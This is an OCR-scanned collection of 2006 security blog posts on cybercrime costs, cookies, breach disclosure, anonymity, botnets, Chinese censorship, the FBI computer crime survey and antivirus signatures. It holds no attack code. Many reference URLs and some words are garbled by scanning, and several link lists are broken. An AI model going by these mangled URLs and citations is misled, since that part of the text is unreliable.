is largely based on his name brand. In this very same way, if we were 

to quantify the losses of a worldwide worm outbreak posed by direct 
attacks of the availability and integrity of networks and hosts, it 

would always be rather unrealistic, yet hopefully scientifically 

justified to a certain extend! 


| feel it’s about time the 

industry appoints a watchdog with an in-depth understanding of the 
concept. A watchdog that has the open source intelligence attitude, and 
the law enforcement backup to diffentiate online identity theft next to 
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dumpest diving, and both, soft and hard dollar losses out of an event. 


- the flawed approaches towards counting the TOC costs 


"We 

had out network hit by a worm attack, where 200 out of 1000 desktops 
got successfully infected resulting in 4 hours downtime of the 200 
desktops, and with the department’s $15 hourly rate it resulted in 
direct loss of productivity." Rather common approach these days, what 
isn’t included is the time the IT/Security department spent fixing the 
problem, the eventually 


increased infosec budget (given the 

department takes advantage of the momentum and asks for more), and and 
potential law suits that may follow by other companies whose systems 

have been attacked by any of the 200 infected ones. A security incident 
shouldn’t be isolated when it comes to costs, yet it’s the best approach 

to bring some accountability, though, it’s totally unrealistic. The 

butterfly effect has its word in both the real, and the financial world 

as well. 


- the hard to quantify intellectual property theft 


Continuing 

my thoughts from the abovementioned opinion, if we were to count the 
IT/Security department’s associated costs, as well as the loss of 
productivity next to the hourly rate, especially when there’s been a 
theft of intellectual property is easy, yet, untrue. If we were to 


even 
estimate the potential dollar losses of intellectual property theft due 
to security breaches, it would surpass the U.S budget’s deficit and 
reach levels of a developing economy’s GDP, | bet that! The current 
inability of the industry to successfully quantify the costs of 
intellectual property theft, results in a mare estimation of the real 
costs of the cyber crime act. In this case, it’s more complex that some 
want to believe. 


- lack of disclosure enforcement 


More 

and more states(U.S only, painfully true but the world is lacking 
behind) are adopting breach disclosure laws with the idea to prevent 
successful use of the information, seek accountability from the 
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organizations/enterprises, and, hopefully result in even more clear 
metrics on what exactly is going on in the wild. However, the lack of 
acceptance, and sometimes, 


even the awareness of being hacked is 

resulting into the highly underestimated, and actual picture in respect 
to the real state of cyber crime today. The more disclosure enforcement, 
and actual awareness of the breaches, the better the metrics, 
understanding of where the threats are going, and accountability for the 
organizations themselves. 


- survey and metrics should always be a subject to question 


The 

way a research company gathers survey and metrics data should always be 
a subject to questions. Even highly respected law enforcement agencies 
surveys and research, clearly indicate similarities, though when it 

comes to financial losses, every organization has a different 

measurement approaches and understanding of the concept. That is why, in 
the majority of cases, they aren’t even aware of the actual long-term, 

or soft dollar losses directly posed by a single security breach. 

Evaluating assets, and assigning dollar values to intellectual property 

is tricky, and it could both, provide a more realistic picture of the 

actual losses, or overestimate 


them due ot the company "falling in love" with the intellectual value of its breached 
information. 


- companies fearing shame do not report the most relevant events today, online extortion or 
DDoS attacks 


No 

company would publicly admit complying with online extortionists, and 
no matter how unprofessional it may sound, a LOT of companies pay not to 
have their reputation damaged, and it’s not just public companies I’m 
talking about. How should a company react in such a situation, fight 
back, have it’s web site shut down resulting in direct $ losses 
outpacing the sum requested by extortionists, or complying with the 
request, to later on having to deal with issue again? How much value 
would a company gain for fighting back, or for publicly stating of 
having such a problem, and complying with it? What’s more, should 
quantifying a successful DDoS attack on a E-shop also include the 
downtime effect for the ISP’s customers, given they don’t null route 
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the site of course? And who’s counting all these counts, and how far would their impact 
actually reach? 


- the umatelized sales of people avoiding shopping online 


A 

topic that is often neglected when it comes to E-commerce, is the HUGE 
number of people that aren’t interested in participating(though they 

have the E-ability to do so), mainly because of the fear posed by cyber 
crime, having their credit card data stolen etc. The current revenues of 
E-commerce in my point of view, are nothing compared to what they could 
be given the industry’s leaders gently unite in order to build 

awareness on their actions towards improving security. | also consider 
these people as a cost due to cyber crime! 


At the bottom line, 

drug addicts don’t exist because of drugs, but because of the society, 
and it may be easier to execute phishing attacks than smuggle cocaine 
from Mexico to the U.S, but this is where the real $ $ $ truly is from my 
point of view - drugZZZZZZZZ.............ceeeeeet) 


Technorati tags : 
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2.1.14 The never-ending "cookie debate" (2006-01-10 17:30) 
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[1] 


On the 6th of January, CNET reported that the web sites of 23 U.S senators use [2]persistent 


cookies (usually expiring around 2035), and several days earlier, [3]Google-Watch.org found 
out the same for [4]NSA’s 


web site. 


[5] 


As a matter of fact, Google, the world’s most popular search 
engine with millions of searches in over 100 languages, also uses 
cookies that [6]Jexpire in 2035. 


But how does this all matter to you? Does erasing your cookies makes 
you invisible, invincible and not traceble? 


Totally wrong! However, 


cookies are the most popular privacy invading concept on the Internet, 
and if you start filling in privacy conscious individuals into the 
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basics of timing attacks, [7]remote physical devices fingerprinting, or distributed surveillance 
possibilities, they'll end up thinking you’re paranoid - for a reason! 


What 

you MUST know concerning your privacy on the Internet is that, in 
today’s globalized Internet, namely hundreds of countries participating, 
privacy laws, their enforcement or even understand of the important of 
the issue, tend to vary from country to country. 


There are worst things that could happen to you compared to cookies, and | refer to them as 
[8]Web Timing Attacks, and how [9]practical they really are! Don’t bother about cookies, 
given you wiped them out, that’s the [10]Cookie Monster’s job :) 


In case you are interested in further info on the topic you can take a look at the following : 


[11]How Web Server’s Cookies Threaten Your Privacy 
[12]Local Shared Objects - "Flash Cookies" 

[13]EPIC’s Cookies Page 

[14]Search Privacy At Google & Other Search Engines 
[15]Bugnosis 


[16]Taking the Byte Out of Cookies 


Technorati tags : 


[17]cookies, [18]persistent cookies, [19]privacy, [20]security, [21]information security 


1. https://photos1. blogger .com/blogger/1933/1779/1600/cookiemonster .0. jpg 


2. http: //news.com. com/Congressthands+caught+intthet+cookie+jar/2100-1028_3-6020711.html?tag=cd.top 
3. http://www. google-watch. org/ 
4. http://www. google-watch.org/nsacook.htm 
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5. 
6. 

7. http://www. caida. org/outreach/papers/2005/f ingerprinting/KohnoBroidoClaffy05-devicefingerprinting. pdf 

8. 

9 


11 


12. http://epic.org/privacy/cookies/flash.html 


10. http://en.wikipedia.org/wiki/Cookie_Monste 
13. http://www.epic.org/privacy/internet/cookies/ 


ttp://www. junkbusters.com/cookies.htm 


14 
15 

16. https://draft.blogger.com/http://cpe.njit.edu/dlnotes/CIS/CIS350/TakingTheByteOutO0fCookies. pdf 
17 

18. 

18. 


20. http://technorati.com/tag/securit 
21. http://technorati.com/tag/informationt+securit 


2.1.15 The hidden internet economy (2006-01-11 17:39) 


Ho 
much does phishing, spam and spyware for instance cost on businesses? 
Should we measure in cash, or hardly quantified long-term affects such 
as reputation damage, loss of confidence in the business, or the 
percentage of people that would think twice before doing any E-shopping 
at all? 


= 


These days, | believe that there’s a huge number of 

individuals with purchasing power that tend to avoid online purchases at 
all. That’s the baby boomers | am talking about, who as a matter of 

fact are having more and more disposable income! 


Published in December, 2005, a poll published by the [1]CSIA 

estimated that almost 50 % of all adults in the U.S avoid making 
purchases online because they are afraid that their personal information 
could be stolen. And while impulsive teens are excluded, and the poll’s 
quality is taken for granted, to me it highlights an important fact 

that | have always believed in - that there is a hidden Internet 

economy that could boom given more confidence is build in ensuring that, 
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this huge number of individuals will start bringing even more online 
revenues to any of the dotcom darlings. Until then, stay tuned for yet 
another major security breach at a data aggregator :( 


Technorati tags : 


[2]internet economy, [3]dotcom, [4]security, [5]information security, [6]CSIA 
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5. : 
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https ://www.csialliance.org/ 


ttp://technorati.com/tag/informationtsecurit 


ttp://technorati.com/tag/CSIA 


2.1.16 Security threats to consider when doing E-Banking (2006-01-12 17:40) 


[1] 


ISN'T THAT FUNNY 
YOU'RE THE EIGHTH PERSON 
TO OPENAN INTERNET 
BANKING ACCOUNT 
Ik =O UNDER THE NAME OF 
= DOUG MYERS TODAY! 
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E-banking, 
and mobile commerce are inevitable part of our daily lifes, and would 
continue to get more popular. 


The bad thing is, that it’s not just us, 

the end users benefiting from this fact, but also, the malicious 

attackers exploiting our naivety and lack of awareness on the threats to 

watch for. [2]Candid Wuuest did an outstanding [3]research on the insecurities of E-banking, 
and excellect job in comparing the different security measures next to one another. The 
[4]slides will also provide you with a lot of useful info on the topic. 


Further info on the topic an also be found at : 


[5]Why eBanking is Bad for your Bank Balance 


[6]Risk management principles for electronic banking 


Technorati tags : 


[7]e-banking, [8]electronic banking,[9] E-commerce,[10] security, [11]information security 
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9. http: //technorati.com/tag/E-commerce 
10. http://technorati.com/tag/securit 
11. http://technorati.com/tag/informationtsecurit 


2.1.17 Insecure Irony (2006-01-12 17:42) 


What’s the worst thing that could happen to [1]BigBrother and any of its puppets? - Have their 
[2]confidential info exposed 

due to the negligence of a commercial organization, one that is used 

for gathering the majority of intelligence data these days. Now, that’s 

an insecure irony. 


It is a public secret that any government is 

gathering enormous information on its citizens through commercial 
organization’s extremely rich databases. Everyone’s in the system 
though, even the ghosts! 


| also advise you to go though a great research on the topic of "[3]Commecial Data and 
National Security" in case you want to know more on how governments and intelligence 
agencies use/abuse the data. 


Technorati tags : 


[4]bigbrother,[5]surveillance,[6]privacy,[7]security breach,[8]security,[9]information secu- 
rity 
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6, http://technorati..con/tag/privacy 

7, http://tecnorat, con/tag/securityvbreudl 

8. heep://eechnorats. con/tag/security 

9, http://tecnorats.con/tag/infornationtsecurity 


2.1.18 Future Trends of Malware (2006-01-16 17:43) 
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Great news, that | greatly anticipated, my "[2]Malware - Future Trends" research got [3]Slash- 
dotted. 

The strange thing is how my actual post and numerous others from 

different respected sites weren’t approved. | guess | would have to live 

with that, given the huge number of hits and new subscribers to my [4]feed | have received for 


the last couple of days :)) 
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Someone 

once said, that it’s all about to courage to write down what you think. 
And he was right, but he missed to mention, that you should also stand 
behind what you believe in. There’s nothing more important than 
disseminating that kind of information to the broadest audience 
possible, in the fastest way achievable. The comments, links recognition 
and active feedback that | have been receiving, are the best benchmark 
for the usefulness of my research. So, thanks! 


My “Malware - future trends” publication has recently appeared at : 


[5]Packetstormsecurity.org 
[6]Securiteam.com 

[7 ]Net-security.org 
[8]LinuxSecurity.com 
[9]Infosecwriters.com 
[10]WhiteDust.net 
[11]ISECA.org 
[12]BankInfoSecurity.com 
[13]Wiretapped.net 
[14]Astalavista.com 
[15]CGIlSecurity.com 
[16]Megasecurity.org 
[17]Secguru.com 


[18]Wikipedia’s entry on Malware 


to name few of the sites, and in various blog comments : 
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[19]Computerworld’s IT Management Blog 
[20]Datamation’s Blog 

[21]Sergio Hernando’s post, and the [22]Google translation 
[23]Alan Cardel’s Blog 


[24]Worm Blog 


And many others : [25]1, [26]2, [27]3, [28]4, [29]5, [30]6, [31]7, [32]8, [33]9, [34]10, 
[35]11, [36]12, [37]13, [38]14, [39]15, [40]16, [41]17, [42]18, [43]19, [44]20 


The 

more naysayers, the more important is what you are doing, and | have 
come across a lot of them, though | wouldn’t even bother to link them 
back. They are a valuable incentive on a certain occasions. It’s a great 
feeling that | missed for a little while, it reminds of the how 

differently people react to one another’s success and hard work. | 
totally enjoy people quoting me on every sentence from a 26 pages 
publication | pretty much finalized on Xmas eve, just for the idea of 
doing it. 


Cheer up, guys, and go through my points objectively. 


What 

| truly like, is the debate it opened up here and there, one of the 
main ideas behind it. Feel free to post your comments at my original 
announcement, [45]Malware - Future Trends. 


Technorati tags : 


[46]Slashdotted,[47]slashdot,[48]malware — trends,[49]malware,[50]security,[51]information 
security 
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2.1.19 To report, or not to report? (2006-01-16 17:45) 


[1]Computerworld is running a story that, “[2]Three more U.S states add laws on data 
breaches”, 

but what would be the consequences of this action? Less security 

breaches? | doubt so. Realistic metrics and reactions whenever an actual 

breach occurs, as well as its future prevention measures? Now that’s 

something | think. 


Such [3]legislations 

have a huge impact, both, on the industry, the public opinion, and 

company itself. No one likes admitting getting hacked, or having 

sensitive information exposed to unknown and obviously malicious party. 

Yet, if it wasn’t companies reporting these breaches, thousands of 

people would have been secretly exposed to possible identity theft, and 

we'll be still living with the idea that the [4]Megacorporations 

are responsibly handling our information. Which they obviously aren’t! 

And even if they try to hide it, sooner or later a victim will starting 

digging in, and the story ends up in mainstream news. [5]Privacyrights.org have taken the 
time and effort to compile a "[6]A Chronology of Data Breaches Reported Since the ChoicePoint 
Incident", and as you can see, it’s not getting any better, though, reporting and legislations 
have the potential to change a lot. 


At 

the bottom line, | am a firm believer that, reporting breaches greatly 
improves the accuracy of security metrics, and hopefully the solutions 
themselves. Security through obscurity is simply out of question when it 
comes to storing unencrypted databases online, or even distributing 
them offline, though, it’s still obviously very popular today. 


What 

do you think? Are the long-term negative PR effects worth the 
uninterrupted business continuity as a whole? Are you comfortable with 
not knowing how exactly is any of the organizations possessing sensitive 
info on you, is taking care to secure it? I’m not! 


As well as various other comments on the topic : 
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[7]Information Security Breaches and the Threat to Consumers 
[8]Security Breaches : Notification, Treatment, and Prevention 


[9]Recommended Practices on Notification of Security Breach Involving Personal Informa- 
tion 


[10]What Does a Computer Security Breach Really Cost? 


Technorati tags : 


[11]information security,[12]security,[13]security breach,[14]id theft 
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. http://www. computerworld.com/securitytopics/security/story/0, 10801, 107574, 00. html 
| http://www. nce1 org/prograns/1is/CIP/priv/breach, hin 

| ictp://en, wikipedia. ong/ iki Moyaconporatiod 

_ecp://aww. privecyrights. ong 

| http: //aww. privacyrights.org/ar/ChronbataBreaches ta 


http://www. hunton.com/files/tbl_s47Details/FileUpload265/1280/Information_Security_Breaches.pdf 


| http://awy educause .odu/ ir /Iabrary/pt /ERWO5413. pa 
_hep://wwy. privacy ca, gov/recomnendations/socbreach. pal 

10. 
12. 

13, 
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2.1.20 Anonymity or Privacy on the Internet? (2006-01-16 17:47) 


Last week, [1]Bruce Schneier wrote a great comment on Anonymity, how it won’t kill the Inter- 
net, and that it has to do with accountability mostly. 


Logically, 
if identification is impossible, then there cannot be adequate 
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accountability. Though, alternative methods based on the collective 

trust exist, and are as anonymous, as necessary. Spoofed identities, 
perhaps even hijacked ones should also be taken into consideration. But 
how important is Anonymity today? What is Anonymity and Privacy anyway? 
When is the first desired to preserve the second? How blur is the line 

in between? | think Anonymity is so much broader than it is originally 
perceived. 


I’ve once mentioned the possibilities of [2]IP cloaking for competitive 
intelligence/disinformation. On the other hand, for me today’s concept of anonymity has 
three dimensions : 


- The individuals trying to achieve anonymity with the idea to express their right of free 
speech, and access [3]censored information 


A [4]chinese citizen 

is the first thing that comes to my mind, though many others are having 

the same problems when trying to access information or express their 

right of free speech, such as [5]Saudi Arabia, [6]United Arab Emirates, [7]Bahrain, [8]lran, 
[9]Singapore, [10]Burma, and [11]Tunisia. 


- Those trying to avoid accountability for certain actions, in one way or another 


[12]Anonymous-p2p.org 

has for instance featured a list of P2P applications that improve 
anonymity to a certain extend. In this case, anonymity is desired in 
order to cover up certain actions. The use of proxy servers to try to 
hide originating host should also be mentioned as a possibility. 


- Those with an established pseudo-anonymity, netizens for instance 
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think pseudo-anonymity is important in today’s society, it’s utopian 
worlds(online gaming worlds etc.), express freedom and promote 
creativity to a certain extend. The entire trust and accountability 

model is actually entrusted on the service, for instance, Ebay as 
mentioned in the original article. You trust that Ebay’s practices going 
beyond this pseudo-anonymity would achieve accountability in case it’s 
necessary. 


What others think on privacy, and why is anonymity hard? 


“[13]There’s no Privacy, get over it” Sun’s CEO Scott McNealy, back in 1999 


John Young, [14]Cryptome.org [15]on privacy, data aggregation, data mining, terrorism fears 
and our constantly digitized lifes : 


“Privacy 

should be a right of citizens worldwide, in particular the right to 

keep government and business from gaining access to private information 
and personal data. The argument that government needs to violate privacy 
in order to assure security is a lie. The business of gathering private 
information by corporations and then selling that to government and 

other businesses is a great threat to civil liberties. Much of this 

technology was developed for intelligence and military uses but has 

since been expanded to include civil society. ” 


Dan Farmer and Charles C.Mann - [16]Surveillance Nation 


“Low-priced 

surveillance technologies will help millions of consumers protect their 
property, plan their commutes, and monitor their families. But as these 
informal intelligence-gathering networks overlap and invade our 
privacy, that very could evaporate.” 
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Does Privacy still exist in the 21st century? Is Anonymity an excuse for Privacy? What do you 
think? 


Further resources on privacy and anonymity can also be found at : 


[17]Real World Patterns of Failure in Anonymity Systems 
[18]Better Anonymous Communications 
[19]Introduction to P3P 

[20]HOWTO bypass Internet Censorship 

[21]Formalizing Anonymity - A Review 

[22]Anonymity made easy 


[23]Anonymity and Pseudonymity in Cyberspace :Deindividuation, Incivility and Lawlessness 
Versus Freedom and Privacy 


Technorati tags : 


[24]privacy,[25]anonymity,[26]censorship,[27]free speech,[28]digital rights 


1. http://www.wired.com/news/columns/0,70000-0.htm 

2. http: //ddanchev. blogspot .com/2005/12/ip-cloaking-and-competitive.htm 
3. http://en.wikipedia. org/wiki/Censorship 
4. 


.opennetinitiative. 
.opennetinitiative. 
.opennetinitiative. 
-opennetinitiative. 


.opennetinitiative. 


12. http://anonymous-p2p. org/ 
13. http://www.wired.com/news/politics/0, 1283, 17538, 00.htm 
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16. http://reviews-zdnet .com. com/4520-7298_16-4207926 .htm 
17. http://www.cl.cam.ac.uk/~rnc1/Patterns_of_Failure.pdf 
18. 

19. 

20 

21. http://www-users.cs.york.ac.uk/~susan/bib/ss/security/389.pdf 
22. 

23. 
24, 

25. 

26 

27 

28. 


2.1.21 What are botnet herds up to? (2006-01-17 17:48) 


[1]Johannes B. Ullrich, with whom | had a [2]chat once, did a great [3]post 
providing us with real-life botnet herds "know how" or the lack of 

such. And while | agree that these are newbies, they are exploiting 
another growing trend. The vertical markers Johannes mentions are the 
result of abusing the affiliate networks themselves. 


Though, how can an 

affiliate network distinguish traffic coming from botnets, should it 

count it as malicious one, can they somehow link everything and see the 
entire picture? They sure can, but as soon as revenues keep coming in, 
they simply wouldn't. 
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The botmasters’ mentioned here are primarily 

acting as [4]domainers, 

and the possibilities for abuse here are countless. In case you’re 

interested in knowing more about the use and abuse of such networks, | 

recommend you to go through [5]Ben Edelman’s research on [6]affiliate networks, and how 
[7leasily they get [8]abused. My point is that, if it takes a newbie to start realizing this, imagine 
the big players, as there are obviously [9]some, at least in respect to the sizes of their botnets 


:) 


If 

they make a buck for selling access to their resources, still have the 

opportunity to do it on their own, and cash again while giving 

instructions on how to "reinfect" yourself, that’s a Ecosystem that | 

mentioned in my recently released "[10]Malware - Future Trends" research. | feel this particular 
botnet herd is up to experiments, that obviously didn’t go unnoticed. 


What are your thoughts on the future of botnets, how would they abuse their power in 
[11]Web 2.0? Week before | release my original publication, someone started coming up with 
"solutions" on how to abuse [12]Google’s AdSense, there’s a lot to come for sure! 


In case you want to know more about botnets, consider going through the following : 


[13]Bots and Botnets: Risks, Issues and Prevention 

[14]The Zombie Roundup: Understanding, Detecting, and Disrupting Botnets 
[15]Botnets as a Vehicle for Online Crime 

[16]Botnets - the threat to the Critical National Infrastructure 

[17]Botnet Detection and Response 

[18]Tracking Botnets 

[19]Robot Wars - How Botnets Work 


[20]Worms, Viruses and Botnets - security awareness video 
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Technorati tags : 


[21]malware,[22]security,[23]information security,[24]botnets 


http: //johannes.homepc.org/ 


ttp://www.astalavista.com/media/archive1/newsletter/issue_21_2005.pdf 
. http://isc.sans.org/diary.php?date=2006-01-14 


_ cep: / fees, benetelman-orp/nere/002406"1 ta 
_hvep:/avs. munet.con/ man /news/2144576 oo tnet=operation-ruled-aiiliod 
10, petp://edanchev bhogepet. cou/2006/01 fubureverenas-of-velvare 16-htal 
11. http: //eeyuebdcon.con/ 
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14. http: //www.arbornetworks.com/downloads/research130/sruti05_final.pdf 
15. http://www.cert.org/archive/pdf/Botnets. pdf 

16. http://www.niscc.gov.uk/niscc/docs/botnet_11a.pdf 

17. http://www.caida. org/projects/oarc/200507/slides/oarc0507-Dagon. pdf 
18. http://www.honeynet.org/papers/bots/ 

19. http: //www.windowsecurity.com/articles/Robot-Wars-How-Botnets-Work.htm 
20. http: //www.waarschuwingsdienst .nl/movies/botnetfilm_en.wm 

21. http://technorati.com/tag/malware 

22. http://technorati.com/tag/securit 

23. bttp://technorati.com/tag/informationtsecurit 


24. http://technorati.com/tag/botnets 


2.1.22 China - the biggest black spot on the Internet’s map (2006-01-17 17:49) 


Chinese Internet users have the potential to [1]outpace 

the number of the U.S Internet population, yet, the majority of them 
still remain behind the most sophisticated online censorship systems in 
the world, the [2]Great Chinese Firewall. 
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| am definitely not buying into the idea of trying to take control of 

all the information coming in and going out of a country for the sake of 
my well being, as any individual has the right to decide what’s good 
and bad for them. 


If |, for instance [3]knew there’s a [4]virus 

on the streets of my city, | would take immediate precautions, or at 

least, see how "my" government reacts on the crisis. Yet, how 
responsible, moral, or legal according to international human rights 
standards is to prosecute users who have been spreading the news about 
the SARS virus from within the Great Firewall is perhaps another point. 


Isn’t [5]central planning 

the panacea of Communism, be it, old-school or modern(an excuse for the 
old-school) one, and isn’t the obvious fact that the government cannot, 

but wants to play God, an utopia by itself? It is disturbing how 

business ethics surpass moral ones for the sake of business continuity, 

so to say. Though, [6]Jefforts 

are made to break the ice, until a collective campaign is not started | 

doubt anything will change. For the time being, what they [7]don’t like, they either 
hijack(forward to another site), or [8]completely restrict. 


With over [9]100,000 cybercafes, 

and 30,000 state police enforcing policies on the Internet, the Chinese 
government is trying to estaliblish a very effective self-censorship 
atmosphere, namely, prosecuting those somehow violating it. The idea is 
to, of course, cut the costs of their censorship efforts. 


U.S companies don’t have a [10]business choice, but to [11]comply in case they are 
interested in taking advantages of the business opportunities in the country. 
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[12]Activists 

have been expressing their attitude towards assistance like that, while 

| feel the majority of business leaders still don’t have the incentive 

to take action, besides the human moral obligations, ones that are often 
neglected when doing business. [13]Sad, but true :) 


For 

me, it’s not businesses complying with local laws that bothers me, but 

the playground for the these vendors that’s fuelling innovation in the 

wrong direction. That very same innovation is later on to used on 

Western countries or pretty much anywhere around the world. For the time 

being, [14]China is still winning against the Web, and the term cyberdissident is getting 
rather common. For instance, the recently started [15]Cryptome.cn, pointed out a great link 
to the actual known number of Chinese actions against [16]journalists. That’s disturbing. 


One of the most resourceful and timely research currently available is [17JONI’s [18]Internet 
Filtering in China in 2004-2005 : A Country Study. Interested in finding out whether a certain 
sites is currently blocked in China? Check the [19]Real-Time Testing of Internet Filtering in 
China, courtesy of [20]Harvard Law School, whose [21]Empirical Analysis of Internet Filtering 
in China still gives an overview of the situation and what’s to consider. 


Further research and opinions on the topic can be found at : 


[22]Internet Development and Information Control in the People’s Republic of China 
[23]Internet censorship in mainland China 

[24]The Internet in China: Civilian and Military Uses 

[25]Internet in China: Big Mama is Watching You 

[26]Internet Filtering in China 


[27]The limits of Internet filtering : A moral case for the maximization of information access 
over the Internet 


[28]Controlling Online Information: Censorship & Cultural Protection 


[29]Tools for Censorship Resistance 
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[30]The Filtering Matrix 


[31]Tor: An anonymous Internet communication system 


Technorati tags : 


[32]privacy,[33]free speech,[34]china censorship,[35]china,[36]censorship 
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2.1.23 FBI’s 2005 Computer Crime Survey - what’s to consider? (2006-01-19 17:51) 


Yesterday, the FBI has [1]released their [2]Annual 2005 Computer Crime Survey, and while 
| bet many other comments will also follow, | have decided to comment on it the way I’ve 
been [3]commenting on the U.S 2004’s "[4]Annual Report to Congress on Foreign Economic 
Collection and Industrial Espionage" 

in previous posts. This one is compiled based on the 24, 000 

participating organizations from 430 cities within the U.S, so look for 

the averages where possible :) 


What are the key summary points, and what you should keep in mind? 


- Attacks are on the rise, as always 


That’s 

greatly anticipated given the ever growing Internet penetration and the 

number of new users whose bandwidth power is reaching levels of a 

middle sized ISP. Taking into consideration the corporate migration 

towards IP based business infrastructure, and even the [5]military’s 

interest in that, it results in quite a lot of both, visible/invisible 

targets. My point is that, to a certain extend a new Internet user is 

exposed to a variety of events that are always static in terms of 

security breaches, or was it like that several years ago? Less [6]Oday’s, lack of client side 
vulnerabilities([7 ]browsers) the way we are seeing it today, and cookies compared to 
[8]spyware 

were the "worst" that could happen to you. Things have changed, but 

malware is still on the top of every survey/research you would come 

across. 


- The threat from within 


[9]Insiders 
dominate the corporate threatscape as always, and the average financial 
losses due to "Laptop/Desktop/PDA Theft", act as an indicator for 
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intellectual or sensitive property theft that is actively quantified to a 

certain extend, though it is still mentioned in a separate section. As 

far as insiders and the responses given in here, "the threat you’re currently not aware of, is 
the threat actually happening" to quote a McAfee’s ad | recently came across to. Especially in 
respect to insiders. 


- [10]To report or not to report? 


According to the survey "Just 

9 % said they reported incidents to law enforcement, believing the 
infractions were not illegal or that there was little law enforcement 

could or would do. Of those reporting, however, 91 % were satisfied with 
law enforcement’s response. And 81 % said they’d report future incidents 
to the FBI or other law enforcement agencies." 


The key point 

here is the lack of understanding of what a threat is, or perhaps what 

exactly should be reported, or why bother at all? And given that out of 

the 9 % reporting 91 % are satisfied | can simply say that, "/f you don’t take care of your 
destiny, someone else will". 


Overall, 

you should consider that the lack of quality statistics is the result 

of both, the "stick to the big picture" research and survey approaches, 
or because of companies not interested/understanding what a security 
threat worth reporting actually is? | greatly feel the industry and the 
Internet as a whole is in need of a commonly accepted approach, and 
while such exist, [11]someone [12]has [13]to 

perhaps communicate them in a more effective way. Broad and 
unstructured definitions of security, result in a great deal of 
insecurities to a certain extend, or have the potential to, doesn’t 
they? 


- Who’s attacking them? 


Their homeland’s infrastructure and the Chinese one, as the top attacks originally came from " 
The U.S. (26.1 %) and China (23.9 %) were the source of over half of the 
intrusion attempts, though masking technologies make it difficult to get 
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an accurate reading", and yes, Russia "of course". 


Though, you 


should keep in mind that whenever someone sparkles a debate on certain 
country’s netblocks attacking another country’s one, it’s always [14]questionable. 


- What measures are actually taken? 


Besides 


actively investing in further solutions, and re-evaluating their 
current measures, what made me an impression as worth mentioning is 


- patching, whether the patch comes from a [15 ]third-party 

or the vendor itself is something else, yes it’s the reactive measure 
that could indeed eliminate "Known" vulnerabilities, yet it’s proactive 
approaches companies should aim at achieving 


- keeping it quiet, 
as you can see the 3rd measure taken is to actually not report what has 


happened, wrong, both in respect to the actual state of security, and 


the potential consequences in case a sensitive info breach occurred and 
customers did the job of reporting and linking it. 


- tracing back? 


| think it’s a bit unrealistic in today’s botnets dominated Internet, 
namely an enterprise might find out that some of its external port scans 


are coming from internal infected PCs. When attacked you always want to 
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know where the hell is it coming from, and who’s involved, and while 
entirely based on the attackers techniques put in place, | feel that 

close cooperation with ISPs in reporting the infected nodes should get 
the priority compared to tracing the attacks back. That greatly depends 
on the attack, its severity, and traceability of course. 


To sum up, the bottom line is that, [16]Jantivirus software and [17]perimeter based defenses 
dominate the perception of security as always, companies are actively 

investing in security and would continue to do so. It’s a very recent [18]survey for you to use, 
or brainstorm on! 


Technorati tags : 
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2.1.24 Why relying on virus signatures simply doesn’t work 
(2006-01-19 17:52) 


As a fan of [1]VirusTotal and [2]Norman’s Sandbox 

being always handy when making analyses or conclusions, and me looking 
for metrics and data to base my judgments on, besides experience, | 

feel their "Failures in Detection" of VT deserve more attention then 

they it’s actually getting. 


With over 14, 000 files submitted ona 

weekly basis, where most of them are supposedly Oday malicious software, 
it’s a great resource to consider. Using [3]these 

scanners for the basis of its service (Saw yours?!), it is still able 

to conclude the plain truth - signature based anti virus protection is 

having deep troubles as a concept these days. 


Moreover, vendors covering 

or enjoying monopolistic competition in specific geographical regions, 
without having the necessary AV expertise is something that is actually 
happening. So what made me an [4limpression? 


Failures in Detection (Last 7 days) 
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anymore? 


- 14, 016 failures that is, infected files not detected by at least one antivirus engine 


- 372 samples detected by all vendors 


What’s 

important to note here is that, response time towards a new piece of 

malware in the wild is crucial as always. But that’s great when it’s 

actually achieved. The independent folks at [5]Av-test.org, have featured a very nice Excel 
sheet on the "[6]Reaction Times of the latest MS05-039-based Worm Attacks"(2005-08-22) so 
you can take a look for yourself. 


And as I’ve once mentioned my opinion on the growing possibility of [7]Oday malware on 
demand, 

proactive measures would hopefully get the attention of vendors. Some 

folks are going as high as stating that AV scanners and AV defense as a 

concept will eventually end up as product line extension of a security 

appliance? Though, | feel you will never be able to license a core 

competency of a vendor that’s been there before the concept of DDoS 

started getting public! And obviously, the number of signatures detected 

by them doesn’t play a major role like it used years ago. Today’s 

competitive factors have to do with, but not only of course : 


Heuristic 

Policy-Based Security 

IPS (Intrusion Prevention Systems) 
Behaviour Blockers 

Protection against Buffer Overruns 


| also advise you to go though a well written research on the topic of [8]Proactive Antivirus 
protection, as it highlights the issues to keep in mind in respect to each of these. Is client side 
sandboxing an [9]alternative 
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as well, could and would a customer agree to act as a Sandbox compared 

to the current(if any!) contribution of forwarding a suspicious sample? 

Would v2.0 constitute of a [10]collective automated web petrol in a PC’s "spare time"? How 
sound is this and the other concepts in terms of usability and deployment on a large scale? 


Signatures 

are always a necessary evil as | like to say, ensure that at least your 
anti virus software vendor is not a newly born company with a modest 
honeyfarm and starting to perceive itself as a vendor, vendor of what? 
Solutions or signatures?! 


Don’t get me wrong, my intention behind 

this post was to make you think, as a customer or decion-maker on the 
approaches your current vendor uses, and how to make better decisions. 
At the bottom line, it’s still a vendor’s sensor network or client side 
submissions, even exchange of data between them, that provides the 
fastest response to *known* malware! 
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fep://awy.virustoval con/flaah/vizustoval, an, btal 
_netp://wuv.virustotal.con/flash/estadisticas_on_beal 
_hetp:/ /uuw.av-testorg/ 

_ fep://awy.av=ceotorg/Acun/as06-090 ay 


http: //www.packetstormsecurity.org/papers/general/malware-trends. pdf 


http: //www.virustotal.com/ 


ttp://www.viruslist.com/en/downloads/vlpdfs/wp_nikishin_proactive_en.pdf 


. http://www. vmware.com/vmtn/vm/browserapp.htm 
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10. http://research microsoft .com/honeymonkey/ 


. http: //technorati.com/tag/securit 
Fite irecmnceats con/eag acces toca] 
13 
14 
15. http://technorati.com/tag/antivirus 
16. : i. 
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http: //technorati.com/tag/malware+trends 


2.1.25 2006 = 1984? (2006-01-23 17:54) 


| 
recently came across great, and very informative slides on current, and 


future trends of surveillance technologies that simply stick to the 
point, as any good slides so to say. "[2]From Target Market to Total Surveillance" is courtesy of 


the [3]The Special Interest Group for Military Applications (SIGMil) at the University of Illinois, 
and is among the many [4]talks and quality [5]projects they have running. 
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"The Survey of Orwellian Technologies" outlines the current situation of privacy invasion and 
who’s who on the market for censorship solutions. 


For instance it correctly states that : 


- [6]Cisco built the Great Firewall at discount to corner router market 


-Video and telephone surveillance networks 


-Buying habits and physical location history 
